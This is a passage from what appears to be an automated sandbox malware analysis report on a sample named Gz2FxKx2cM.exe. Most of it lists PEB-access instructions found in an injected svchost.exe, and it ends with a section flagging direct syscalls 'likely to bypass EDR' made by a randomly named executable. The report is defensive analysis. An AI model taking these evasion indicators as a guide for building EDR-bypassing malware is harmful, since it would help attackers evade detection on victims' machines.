                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]2_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]2_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]2_2_03728B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]2_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]2_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]2_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]2_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]2_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]2_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]2_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]2_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]2_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]2_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]2_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]2_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]2_2_03804940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]2_2_03760854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]2_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_009580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_009580A9
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0092A124 SetUnhandledExceptionFilter,0_2_0092A124
                Source: C:\Users\user\Desktop\Gz2FxKx2cM.exeCode function: 0_2_0092A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0092A155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
